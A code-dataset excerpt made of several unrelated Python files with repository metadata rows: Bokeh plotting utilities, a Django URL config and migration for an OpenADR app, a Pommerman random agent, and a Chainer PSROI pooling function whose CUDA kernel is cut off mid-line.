responsive (boolean): Whether the plot should resize responsively
size_multiplier (float): Multiplier for supplied plot dimensions
logger (param.Parameters): Parameters object to issue warnings on
Returns:
Returns two dictionaries one for the aspect and sizing modes,
and another for the plot dimensions.
"""
fixed_width = (explicit_width or frame_width)
fixed_height = (explicit_height or frame_height)
fixed_aspect = aspect or data_aspect
if aspect == 'square':
aspect = 1
elif aspect == 'equal':
data_aspect = 1
# Plot dimensions
height = None if height is None else int(height*size_multiplier)
width = None if width is None else int(width*size_multiplier)
frame_height = None if frame_height is None else int(frame_height*size_multiplier)
frame_width = None if frame_width is None else int(frame_width*size_multiplier)
actual_width = frame_width or width
actual_height = frame_height or height
if frame_width is not None:
width = None
if frame_height is not None:
height = None
sizing_mode = 'fixed'
if responsive:
if fixed_height and fixed_width:
responsive = False
if logger:
logger.warning("responsive mode could not be enabled "
"because fixed width and height were "
"specified.")
elif fixed_width:
height = None
sizing_mode = 'fixed' if fixed_aspect else 'stretch_height'
elif fixed_height:
width = None
sizing_mode = 'fixed' if fixed_aspect else 'stretch_width'
else:
width, height = None, None
if fixed_aspect:
if responsive == 'width':
sizing_mode = 'scale_width'
elif responsive == 'height':
sizing_mode = 'scale_height'
else:
sizing_mode = 'scale_both'
else:
if responsive == 'width':
sizing_mode = 'stretch_both'
elif responsive == 'height':
sizing_mode = 'stretch_height'
else:
sizing_mode = 'stretch_both'
if fixed_aspect:
aspect_type = 'data_aspect' if data_aspect else 'aspect'
if fixed_width and fixed_height and aspect:
if aspect == 'equal':
data_aspect = None
if logger:
logger.warning(
"%s value was ignored because absolute width and "
"height values were provided. To set the scaling "
"between the x- and y-axis independent of the "
"width and height values set the data_aspect."
% aspect_type)
elif not data_aspect:
aspect = None
if logger:
logger.warning(
"%s value was ignored because absolute width and "
"height values were provided. Either supply "
"explicit frame_width and frame_height to achieve "
"desired aspect OR supply a combination of width "
"or height and an aspect value." % aspect_type)
elif fixed_width and responsive:
height = None
responsive = False
if logger:
logger.warning("responsive mode could not be enabled "
"because fixed width and aspect were "
"specified.")
elif fixed_height and responsive:
width = None
responsive = False
if logger:
logger.warning("responsive mode could not be enabled "
"because fixed height and aspect were "
"specified.")
elif responsive == 'width':
sizing_mode = 'scale_width'
elif responsive == 'height':
sizing_mode = 'scale_height'
if responsive == 'width' and fixed_width:
responsive = False
if logger:
logger.warning("responsive width mode could not be enabled "
"because a fixed width was defined.")
if responsive == 'height' and fixed_height:
responsive = False
if logger:
logger.warning("responsive height mode could not be enabled "
"because a fixed height was defined.")
match_aspect = False
aspect_scale = 1
aspect_ratio = None
if data_aspect:
match_aspect = True
if (fixed_width and fixed_height):
frame_width, frame_height = frame_width or width, frame_height or height
elif fixed_width or not fixed_height:
height = None
elif fixed_height or not fixed_width:
width = None
aspect_scale = data_aspect
if aspect == 'equal':
aspect_scale = 1
elif responsive:
aspect_ratio = aspect
elif (fixed_width and fixed_height):
pass
elif isnumeric(aspect):
if responsive:
aspect_ratio = aspect
elif fixed_width:
frame_width = actual_width
frame_height = int(actual_width/aspect)
width, height = None, None
else:
frame_width = int(actual_height*aspect)
frame_height = actual_height
width, height = None, None
elif aspect is not None and logger:
logger.warning('aspect value of type %s not recognized, '
'provide a numeric value, \'equal\' or '
'\'square\'.')
return ({'aspect_ratio': aspect_ratio,
'aspect_scale': aspect_scale,
'match_aspect': match_aspect,
'sizing_mode' : sizing_mode},
{'frame_width' : frame_width,
'frame_height': frame_height,
'plot_height' : height,
'plot_width' : width})
@contextmanager
def silence_warnings(*warnings):
"""
Context manager for silencing bokeh validation warnings.
"""
for warning in warnings:
silence(warning)
try:
yield
finally:
for warning in warnings:
silence(warning, False)
def empty_plot(width, height):
"""
Creates an empty and invisible plot of the specified size.
"""
return Spacer(width=width, height=height)
def font_size_to_pixels(size):
"""
Convert a fontsize to a pixel value
"""
if size is None or not isinstance(size, basestring):
return
conversions = {'em': 16, 'pt': 16/12.}
val = re.findall('\d+', size)
unit = re.findall('[a-z]+', size)
if (val and not unit) or (val and unit[0] == 'px'):
return int(val[0])
elif val and unit[0] in conversions:
return (int(int(val[0]) * conversions[unit[0]]))
def make_axis(axis, size, factors, dim, flip=False, rotation=0,
label_size=None, tick_size=None, axis_height=35):
factors = list(map(dim.pprint_value, factors))
nchars = np.max([len(f) for f in factors])
ranges = FactorRange(factors=factors)
ranges2 = Range1d(start=0, end=1)
axis_label = dim_axis_label(dim)
reset = "range.setv({start: 0, end: range.factors.length})"
ranges.callback = CustomJS(args=dict(range=ranges), code=reset)
axis_props = {}
if label_size:
axis_props['axis_label_text_font_size'] = value(label_size)
if tick_size:
axis_props['major_label_text_font_size'] = value(tick_size)
tick_px = font_size_to_pixels(tick_size)
if tick_px is None:
tick_px = 8
label_px = font_size_to_pixels(label_size)
if label_px is None:
label_px = 10
rotation = np.radians(rotation)
if axis == 'x':
align = 'center'
# Adjust height to compensate for label rotation
height = int(axis_height + np.abs(np.sin(rotation)) *
((nchars*tick_px)*0.82)) + tick_px + label_px
opts = dict(x_axis_type='auto', x_axis_label=axis_label,
x_range=ranges, y_range=ranges2, plot_height=height,
plot_width=size)
else:
# Adjust width to compensate for label rotation
align = 'left' if flip else 'right'
width = int(axis_height + np.abs(np.cos(rotation)) *
((nchars*tick_px)*0.82)) + tick_px + label_px
opts = dict(y_axis_label=axis_label, x_range=ranges2,
y_range=ranges, plot_width=width, plot_height=size)
p = Figure(toolbar_location=None, tools=[], **opts)
p.outline_line_alpha = 0
p.grid.grid_line_alpha = 0
if axis == 'x':
p.yaxis.visible = False
axis = p.xaxis[0]
if flip:
p.above = p.below
p.below = []
p.xaxis[:] = p.above
else:
p.xaxis.visible = False
axis = p.yaxis[0]
if flip:
p.right = p.left
p.left = []
p.yaxis[:] = p.right
axis.major_label_orientation = rotation
axis.major_label_text_align = align
axis.major_label_text_baseline = 'middle'
axis.update(**axis_props)
return p
def hsv_to_rgb(hsv):
"""
Vectorized HSV to RGB conversion, adapted from:
http://stackoverflow.com/questions/24852345/hsv-to-rgb-color-conversion
"""
h, s, v = (hsv[..., i] for i in range(3))
shape = h.shape
i = np.int_(h*6.)
f = h*6.-i
q = f
t = 1.-f
i = np.ravel(i)
f = np.ravel(f)
i%=6
t = np.ravel(t)
q = np.ravel(q)
s = np.ravel(s)
v = np.ravel(v)
clist = (1-s*np.vstack([np.zeros_like(f),np.ones_like(f),q,t]))*v
#0:v 1:p 2:q 3:t
order = np.array([[0,3,1],[2,0,1],[1,0,3],[1,2,0],[3,1,0],[0,1,2]])
rgb = clist[order[i], np.arange(np.prod(shape))[:,None]]
return rgb.reshape(shape+(3,))
def pad_width(model, table_padding=0.85, tabs_padding=1.2):
"""
Computes the width of a model and sets up appropriate padding
for Tabs and DataTable types.
"""
if isinstance(model, Row):
vals = [pad_width(child) for child in model.children]
width = np.max([v for v in vals if v is not None])
elif isinstance(model, Column):
vals = [pad_width(child) for child in model.children]
width = np.sum([v for v in vals if v is not None])
elif isinstance(model, Tabs):
vals = [pad_width(t) for t in model.tabs]
width = np.max([v for v in vals if v is not None])
for model in model.tabs:
model.width = width
width = int(tabs_padding*width)
elif isinstance(model, DataTable):
width = model.width
model.width = int(table_padding*width)
elif isinstance(model, (WidgetBox, Div)):
width = model.width
elif model:
width = model.plot_width
else:
width = 0
return width
def pad_plots(plots):
"""
Accepts a grid of bokeh plots in form of a list of lists and
wraps any DataTable or Tabs in a WidgetBox with appropriate
padding. Required to avoid overlap in gridplot.
"""
widths = []
for row in plots:
row_widths = []
for p in row:
width = pad_width(p)
row_widths.append(width)
widths.append(row_widths)
plots = [[WidgetBox(p, width=w) if isinstance(p, (DataTable, Tabs)) else p
for p, w in zip(row, ws)] for row, ws in zip(plots, widths)]
return plots
def filter_toolboxes(plots):
"""
Filters out toolboxes out of a list of plots to be able to compose
them into a larger plot.
"""
if isinstance(plots, list):
plots = [filter_toolboxes(plot) for plot in plots]
elif hasattr(plots, 'children'):
plots.children = [filter_toolboxes(child) for child in plots.children
if not isinstance(child, ToolbarBox)]
return plots
def py2js_tickformatter(formatter, msg=''):
"""
Uses py2js to compile a python tick formatter to JS code
"""
try:
from pscript import py2js
except ImportError:
param.main.param.warning(
msg+'Ensure pscript is installed ("conda install pscript" '
'or "pip install pscript")')
return
try:
jscode = py2js(formatter, 'formatter')
except Exception as e:
error = 'Pyscript raised an error: {0}'.format(e)
error = error.replace('%', '%%')
param.main.param.warning(msg+error)
return
args = _getargspec(formatter).args
arg_define = 'var %s = tick;' % args[0] if args else ''
return_js = 'return formatter();\n'
jsfunc = '\n'.join([arg_define, jscode, return_js])
match = re.search('(formatter \= function \(.*\))', jsfunc )
return jsfunc[:match.start()] + 'formatter = function ()' + jsfunc[match.end():]
def get_tab_title(key, frame, overlay):
"""
Computes a title for bokeh tabs from the key in the overlay, the
element and the containing (Nd)Overlay.
"""
if isinstance(overlay, Overlay):
if frame is not None:
title = []
if frame.label:
title.append(frame.label)
if frame.group != frame.params('group').default:
title.append(frame.group)
else:
title.append(frame.group)
else:
title = key
title = ' '.join(title)
else:
title = ' | '.join([d.pprint_value_string(k) for d, k in
zip(overlay.kdims, key)])
return title
def filter_batched_data(data, mapping):
"""
Iterates over the data and mapping for a ColumnDataSource and
replaces columns with repeating values with a scalar. This is
purely and optimization for scalar types.
"""
for k, v in list(mapping.items()):
if isinstance(v, dict) and 'field' in v:
if 'transform' in v:
continue
v = v['field']
elif not isinstance(v, basestring):
continue
values = data[v]
try:
if len(unique_array(values)) == 1:
mapping[k] = values[0]
del data[v]
except:
pass
def cds_column_replace(source, data):
"""
Determine if the CDS.data requires a full replacement or simply
needs to be updated. A replacement is required if untouched
columns are not the same length as the columns being updated.
"""
current_length = [len(v) for v in source.data.values()
if isinstance(v, (list,)+arraylike_types)]
new_length = [len(v) for v in data.values() if isinstance(v, (list, np.ndarray))]
untouched = [k for k in source.data if k not in data]
return bool(untouched and current_length and new_length and current_length[0] != new_length[0])
@contextmanager
def hold_policy(document, policy, server=False):
"""
Context manager to temporary override the hold policy.
"""
old_policy = document._hold
document._hold = policy
try:
yield
finally:
if server and not old_policy:
document.unhold()
else:
document._hold = old_policy
def recursive_model_update(model, props):
"""
Recursively updates attributes on a model including other
models. If the type of the new model matches the old model
properties are simply updated, otherwise the model is replaced.
"""
updates = {}
valid_properties = model.properties_with_values()
for k, v in props.items():
if isinstance(v, Model):
nested_model = getattr(model, k)
if type(v) is type(nested_model):
nested_props = v.properties_with_values(include_defaults=False)
recursive_model_update(nested_model, nested_props)
else:
setattr(model, k, v)
elif k in valid_properties and v != valid_properties[k]:
updates[k] = v
model.update(**updates)
def update_shared_sources(f):
"""
Context manager to ensures data sources shared between multiple
plots are cleared and updated appropriately avoiding warnings and
allowing empty frames on subplots. Expects a list of
shared_sources and a mapping of the columns expected columns for
each source in the plots handles.
"""
def wrapper(self, *args, **kwargs):
source_cols = self.handles.get('source_cols', {})
shared_sources = self.handles.get('shared_sources', [])
for source in shared_sources:
source.data.clear()
if self.document and self.document._held_events:
self.document._held_events = self.document._held_events[:-1]
ret = f(self, *args, **kwargs)
for source in shared_sources:
expected = source_cols[id(source)]
found = [c for c in expected if c in source.data]
empty = np.full_like(source.data[found[0]], np.NaN) if found else []
patch = {c: empty for c in expected if c not in source.data}
source.data.update(patch)
return ret
return wrapper
def categorize_array(array, dim):
"""
Uses a Dimension instance to convert an array of values to categorical
(i.e. string) values and applies escaping for colons, which bokeh
treats as a categorical suffix.
"""
return np.array([dim.pprint_value(x) for x in array])
class periodic(object):
"""
Mocks the API of periodic Thread in hv.core.util, allowing a smooth
API transition on bokeh server.
"""
def __init__(self, document):
self.document = document
self.callback = None
self.period = None
self.count = None
self.counter = None
self._start_time = None
self.timeout = None
self._pcb = None
@property
def completed(self):
return self.counter is None
def start(self):
self._start_time = time.time()
if self.document is None:
raise RuntimeError('periodic was registered to be run on bokeh'
'server but no document was found.')
self._pcb = self.document.add_periodic_callback(self._periodic_callback, self.period)
def __call__(self, period, count, callback, timeout=None, block=False):
if isinstance(count, int):
if count < 0: raise ValueError('Count value must be positive')
elif not type(count) is type(None):
raise ValueError('Count value must be a positive integer or None')
self.callback = callback
self.period = period*1000.
self.timeout = timeout
self.count = count
self.counter = 0
return self
def _periodic_callback(self):
self.callback(self.counter)
self.counter += 1
if self.timeout is not None:
dt = (time.time() - self._start_time)
if dt > self.timeout:
self.stop()
if self.counter == self.count:
self.stop()
def stop(self):
self.counter = None
self.timeout = None
try:
self.document.remove_periodic_callback(self._pcb)
except ValueError: # Already stopped
pass
self._pcb = None
def __repr__(self):
return 'periodic(%s, %s, %s)' % (self.period,
self.count,
callable_name(self.callback))
def __str__(self):
return repr(self)
def attach_periodic(plot):
"""
Attaches plot refresh to all streams on the object.
"""
def append_refresh(dmap):
for dmap in get_nested_dmaps(dmap):
dmap.periodic._periodic_util = periodic(plot.document)
return plot.hmap.traverse(append_refresh, [DynamicMap])
def date_to_integer(date):
"""Converts support date types to milliseconds since epoch
Attempts highest precision conversion of different datetime
formats to milliseconds since the epoch (1970-01-01 00:00:00).
If datetime is a cftime with a non-standard calendar the
caveats described in hv.core.util.cftime_to_timestamp apply.
Args:
date: Date- or datetime-like object
Returns:
Milliseconds since 1970-01-01 00:00:00
"""
if pd and isinstance(date, pd.Timestamp):
try:
date = date.to_datetime64()
except:
date = date.to_datetime()
if isinstance(date, np.datetime64):
return date.astype('datetime64[ms]').astype(float)
elif isinstance(date, cftime_types):
return cftime_to_timestamp(date, 'ms')
if hasattr(date, 'timetuple'):
dt_int = calendar.timegm(date.timetuple())*1000
else:
raise ValueError('Datetime type not recognized')
return dt_int
def glyph_order(keys, draw_order=[]):
"""
Orders a set of glyph handles using regular sort and an explicit
sort order. The explicit draw order must take the form of a list
of glyph names while the keys should be glyph names with a custom
suffix. The draw order may only match subset of the keys and any
matched items will take precedence over other entries.
"""
keys = sorted(keys)
def order_fn(glyph):
matches = [item for item in draw_order if glyph.startswith(item)]
return ((draw_order.index(matches[0]), glyph) if matches else
(1e9+keys.index(glyph), glyph))
return sorted(keys, key=order_fn)
def colormesh(X, Y):
"""
Generates line paths for a quadmesh given 2D arrays of X and Y
coordinates.
"""
X1 = X[0:-1, 0:-1].ravel()
Y1 = Y[0:-1, 0:-1].ravel()
X2 = X[1:, 0:-1].ravel()
Y2 = Y[1:, 0:-1].ravel()
X3 = X[1:, 1:].ravel()
Y3 = Y[1:, 1:].ravel()
X4 = X[0:-1, 1:].ravel()
Y4 = Y[0:-1, 1:].ravel()
X = np.column_stack([X1, X2, X3, X4, X1])
Y = np.column_stack([Y1, Y2, Y3, Y4, Y1])
return X, Y
def theme_attr_json(theme, attr):
if isinstance(theme, str) and theme in built_in_themes:
return built_in_themes[theme]._json['attrs'].get(attr, {})
elif isinstance(theme, Theme):
return theme._json['attrs'].get(attr, {})
else:
return {}
def multi_polygons_data(element):
"""
Expands polygon data which contains holes to a bokeh multi_polygons
representation. Multi-polygons split by nans are expanded and the
correct list of holes is assigned to each sub-polygon.
"""
paths = element.split(datatype='array', dimensions=element.kdims)
xs, ys = ([path[:, idx] for path in paths] for idx in (0, 1))
holes = element.holes()
xsh, ysh = [], []
for x, y, multi_hole in zip(xs, ys, holes):
xhs = [[h[:, 0] for h in hole] for hole in multi_hole]
yhs = [[h[:, 1] for h in hole] for hole in multi_hole]
array = np.column_stack([x, y])
splits = np.where(np.isnan(array[:, :2].astype('float')).sum(axis=1))[0]
arrays = np.split(array, splits+1) if len(splits) else [array]
multi_xs, multi_ys = [], []
for i, (path, hx, hy) in enumerate(zip(arrays, xhs, yhs)):
if i != (len(arrays)-1):
path = path[:-1]
multi_xs.append([path[:, 0]]+hx)
multi_ys.append([path[:, 1]]+hy)
xsh.append(multi_xs)
ysh.append(multi_ys)
return xsh, ysh
def match_dim_specs(specs1, specs2):
"""Matches dimension specs used to link axes.
Axis dimension specs consists of a list of tuples corresponding
to each dimension, each tuple spec has the form (name, label, unit).
The name and label must match exactly while the unit only has to
match if both specs define one.
"""
if (specs1 is None or specs2 is None) or (len(specs1) != len(specs2)):
return False
for spec1, spec2 in zip(specs1, specs2):
for s1, s2 in zip(spec1, spec2):
if s1 is None or s2 is None:
continue
if s1 != s2:
return False
return True
| 34.303671 | 118 | 0.608904 |
26c463caa65b66df689bea6215288b6e4d454215
| 5,234 |
py
|
Python
|
kisensum/openadr/openadr/vtn/urls.py
|
ChargePoint/volttron-applications
|
8d99c01a93f7c1ea98d4e4b0cfcefe85fe26320b
|
[
"BSD-3-Clause"
] | null | null | null |
kisensum/openadr/openadr/vtn/urls.py
|
ChargePoint/volttron-applications
|
8d99c01a93f7c1ea98d4e4b0cfcefe85fe26320b
|
[
"BSD-3-Clause"
] | 4 |
2021-03-19T23:36:34.000Z
|
2021-12-13T19:45:54.000Z
|
kisensum/openadr/openadr/vtn/urls.py
|
ChargePoint/volttron-applications
|
8d99c01a93f7c1ea98d4e4b0cfcefe85fe26320b
|
[
"BSD-3-Clause"
] | 1 |
2020-05-25T05:03:55.000Z
|
2020-05-25T05:03:55.000Z
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
from django.conf.urls import url
from django.views.generic import RedirectView
from vtn import views
from django.contrib.auth import views as auth_views
from django.contrib.auth.decorators import login_required
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
app_name = 'vtn'
urlpatterns = [
url(r'^$', RedirectView.as_view(url='/vtn/login')),
url(r'^home/$',views.overview, name='home'),
url(r'^login/$', auth_views.login, {'template_name': 'login.html'}, name='login'),
url(r'^logout/$', auth_views.logout, {'template_name': 'logged_out.html'}, name='logout'),
url(r'^customer-detail/(?P<pk>\w+)$', views.CustomerDetailView.as_view(), name='customer_detail'),
url(r'^site-detail/(?P<pk>\w+)$', views.SiteDetailView.as_view(), name='site_detail'),
url(r'^dr_event/$', login_required(views.DREventAdd.as_view()), name='dr_event'),
url(r'^customer-edit/(?P<pk>[0-9]+)$', views.CustomerUpdate.as_view(), name='customer_update'),
url(r'customer/add/$', views.CustomerCreate.as_view(), name='customer_add'),
url(r'^export/(?P<pk>[0-9]+)/$', login_required(views.dr_event_export), name='export_dr_events_csv'),
url(r'^report/$', login_required(views.report), name='report'),
url(r'^export/filter/$', login_required(views.get_more_tables), name='get_more_tables'),
url(r'^dr-event/add/$', login_required(views.get_dr_event_form), name='get_dr_event_form'),
url(r'site/create/(?P<pk>[0-9]+)/$', login_required(views.CreateSiteView.as_view()), name='create_site'),
url(r'^home/(?P<pk>[0-9]+)/$', login_required(views.delete_dr_event), name='dr_event_delete'),
url(r'dr_event/(?P<pk>[0-9]+)/$', login_required(views.dr_event_dispatch), name='dr_event_dispatch'),
url(r'dr_event/view/(?P<pk>[0-9]+)/$', login_required(views.DREventCreate.as_view()), name='dr_event_update'),
url(r'dr_event/detail/(?P<pk>[0-9]+)/$', login_required(views.DREventDetail.as_view()), name='dr_event_detail'),
url(r'dr_event/detail/(?P<pk>[0-9]+)/customer/$', login_required(views.get_dr_event_details), name='dr_event_get_details'),
url(r'^home/(?P<pk>[0-9]+)/$', login_required(views.cancel_dr_event), name='dr_event_cancel'),
url(r'password_change/$', login_required(views.change_password), name='change_password'),
]
urlpatterns += router.urls
| 54.520833 | 127 | 0.748376 |
884783b3b22e9942259648a09e1d2dbe6ddfb654
| 210 |
py
|
Python
|
pommerman/agents/random_agent.py
|
alekseynp/playground
|
523cc924fe9fd269a8eb3e29c45ace1c5c85b12c
|
[
"Apache-2.0"
] | 8 |
2019-06-11T16:08:25.000Z
|
2020-10-28T09:03:53.000Z
|
pommerman/agents/random_agent.py
|
alekseynp/playground
|
523cc924fe9fd269a8eb3e29c45ace1c5c85b12c
|
[
"Apache-2.0"
] | 1 |
2019-06-21T03:57:35.000Z
|
2019-06-21T03:57:35.000Z
|
pommerman/agents/random_agent.py
|
alekseynp/playground
|
523cc924fe9fd269a8eb3e29c45ace1c5c85b12c
|
[
"Apache-2.0"
] | 1 |
2018-03-21T15:21:52.000Z
|
2018-03-21T15:21:52.000Z
|
from . import BaseAgent
class RandomAgent(BaseAgent):
"""The Random Agent that returns random actions given an action_space."""
def act(self, obs, action_space):
return action_space.sample()
| 23.333333 | 77 | 0.714286 |
2ed9bfa7d05f8c8dc41dd4079a3e9afae6e955a4
| 507 |
py
|
Python
|
users/migrations/0023_auto_20201125_1018.py
|
ominicomdevgt/LaChalupa
|
3e7ea16fa97aa311bd3513dc463c30c37dfb5761
|
[
"MIT"
] | null | null | null |
users/migrations/0023_auto_20201125_1018.py
|
ominicomdevgt/LaChalupa
|
3e7ea16fa97aa311bd3513dc463c30c37dfb5761
|
[
"MIT"
] | null | null | null |
users/migrations/0023_auto_20201125_1018.py
|
ominicomdevgt/LaChalupa
|
3e7ea16fa97aa311bd3513dc463c30c37dfb5761
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.2 on 2020-11-25 16:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0022_auto_20201123_1624'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='comment',
field=models.CharField(blank=True, default='Tu cuenta será verificada en un periodo máximo de 1 hora', max_length=1000, null=True, verbose_name='Commentario'),
),
]
| 26.684211 | 171 | 0.642998 |
e359f7b9dcabff9ab63d15cd678da2bceedff927
| 16,026 |
py
|
Python
|
chainercv/functions/psroi_pooling_2d.py
|
iory/chainercv
|
ecb1953f78c526dfd38308d68a4094c9f4df3a8d
|
[
"MIT"
] | 1 |
2018-08-24T02:28:31.000Z
|
2018-08-24T02:28:31.000Z
|
chainercv/functions/psroi_pooling_2d.py
|
iory/chainercv
|
ecb1953f78c526dfd38308d68a4094c9f4df3a8d
|
[
"MIT"
] | null | null | null |
chainercv/functions/psroi_pooling_2d.py
|
iory/chainercv
|
ecb1953f78c526dfd38308d68a4094c9f4df3a8d
|
[
"MIT"
] | 2 |
2019-12-16T02:20:26.000Z
|
2022-01-17T02:00:49.000Z
|
# Modified work:
# ------------------------------------------------------------------------
# Copyright (c) 2018 Preferred Networks, Inc.
# ------------------------------------------------------------------------
# Original works of CUDA kernel in forward_gpu and forward_gpu:
# ------------------------------------------------------------------------
# Copyright (c) 2017 Microsoft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Written by Yi Li, Tairui Chen, Guodong Zhang, Haozhi Qi and Jifeng Dai
# https://github.com/msracver/FCIS
# ------------------------------------------------------------------------
from __future__ import division
import numpy as np
import six
from chainer.backends import cuda
from chainer import function
from chainer.utils import type_check
if cuda.available:
import cupy as cp
def _roi_pooling_slice(size, stride, max_size, roi_offset):
start = int(np.floor(size * stride))
end = int(np.ceil((size + 1) * stride))
start = min(max(start + roi_offset, 0), max_size)
end = min(max(end + roi_offset, 0), max_size)
return slice(start, end), end - start
class PSROIPooling2D(function.Function):
def __init__(self, out_c, out_h, out_w, spatial_scale, group_size):
self.out_c, self.out_h, self.out_w = out_c, out_h, out_w
self.spatial_scale = spatial_scale
self.group_size = group_size
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, roi_type, roi_index_type = in_types
type_check.expect(
x_type.dtype == np.float32,
x_type.ndim == 4,
roi_type.dtype == np.float32,
roi_type.ndim == 2,
roi_type.shape[1] == 4,
roi_index_type.dtype == np.int32,
roi_index_type.ndim == 1,
roi_type.shape[0] == roi_index_type.shape[0]
)
def forward_cpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_roi = bottom_rois.shape[0]
top_data = np.empty(
(n_roi, self.out_c, self.out_h, self.out_w), dtype=np.float32)
for i_roi in six.moves.range(n_roi):
y_min, x_min, y_max, x_max = bottom_rois[i_roi]
batch_index = bottom_roi_indices[i_roi]
y_min = round(y_min * self.spatial_scale)
x_min = round(x_min * self.spatial_scale)
y_max = round(y_max * self.spatial_scale)
x_max = round(x_max * self.spatial_scale)
roi_height = max(y_max - y_min, 0.1)
roi_width = max(x_max - x_min, 0.1)
stride_c = channels / self.out_c
stride_h = roi_height / self.out_h
stride_w = roi_width / self.out_w
group_h = int(round(self.out_h / self.group_size))
group_w = int(round(self.out_w / self.group_size))
for out_h in six.moves.range(self.out_h):
slice_h, len_h = _roi_pooling_slice(
out_h, stride_h, height, int(y_min))
if slice_h.stop <= slice_h.start:
continue
for out_w in six.moves.range(self.out_w):
slice_w, len_w = _roi_pooling_slice(
out_w, stride_w, width, int(x_min))
if slice_w.stop <= slice_w.start:
continue
for out_c in six.moves.range(self.out_c):
slice_c, len_c = _roi_pooling_slice(
out_c, stride_c, channels, 0)
roi_data = bottom_data[
batch_index, slice_c, slice_h, slice_w]\
.reshape((len_c, -1))
c = (out_h // group_h) * self.group_size \
+ (out_w // group_w)
top_data[i_roi, out_c, out_h, out_w] = np.average(
roi_data[c])
return top_data,
def forward_gpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_roi = bottom_rois.shape[0]
top_data = cp.empty(
(n_roi, self.out_c, self.out_h, self.out_w), dtype=np.float32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 bottom_data, raw float32 bottom_rois,
raw int32 bottom_roi_indices,
float32 spatial_scale, int32 channels,
int32 height, int32 width,
int32 pooled_dim, int32 pooled_height, int32 pooled_width,
int32 group_size
''',
'float32 top_data',
'''
// pos in output filter
int ph = (i / pooled_width) % pooled_height;
int pw = i % pooled_width;
int ctop = (i / pooled_width / pooled_height) % pooled_dim;
int n = i / pooled_width / pooled_height / pooled_dim;
int roi_batch_ind = bottom_roi_indices[n];
float roi_start_h = static_cast<float>(
round(bottom_rois[n * 4 + 0])) * spatial_scale;
float roi_start_w = static_cast<float>(
round(bottom_rois[n * 4 + 1])) * spatial_scale;
float roi_end_h = static_cast<float>(
round(bottom_rois[n * 4 + 2])) * spatial_scale;
float roi_end_w = static_cast<float>(
round(bottom_rois[n * 4 + 3])) * spatial_scale;
// Force too small ROIs to be 1x1
float roi_height = max(roi_end_h - roi_start_h, 0.1);
float roi_width = max(roi_end_w - roi_start_w, 0.1); // avoid 0
// Compute w and h at bottom
float bin_size_h = roi_height / static_cast<float>(pooled_height);
float bin_size_w = roi_width / static_cast<float>(pooled_width);
int hstart = static_cast<int>(floor(static_cast<float>(ph)
* bin_size_h + roi_start_h));
int wstart = static_cast<int>(floor(static_cast<float>(pw)
* bin_size_w + roi_start_w));
int hend = static_cast<int>(ceil(static_cast<float>(ph + 1)
* bin_size_h + roi_start_h));
int wend = static_cast<int>(ceil(static_cast<float>(pw + 1)
* bin_size_w + roi_start_w));
// Add roi offsets and clip to input boundaries
hstart = min(max(hstart, 0), height);
wstart = min(max(wstart, 0), width);
hend = min(max(hend, 0), height);
wend = min(max(wend, 0), width);
bool is_empty = (hend <= hstart) || (wend <= wstart);
// Compute c at bottom
int gh = floor(
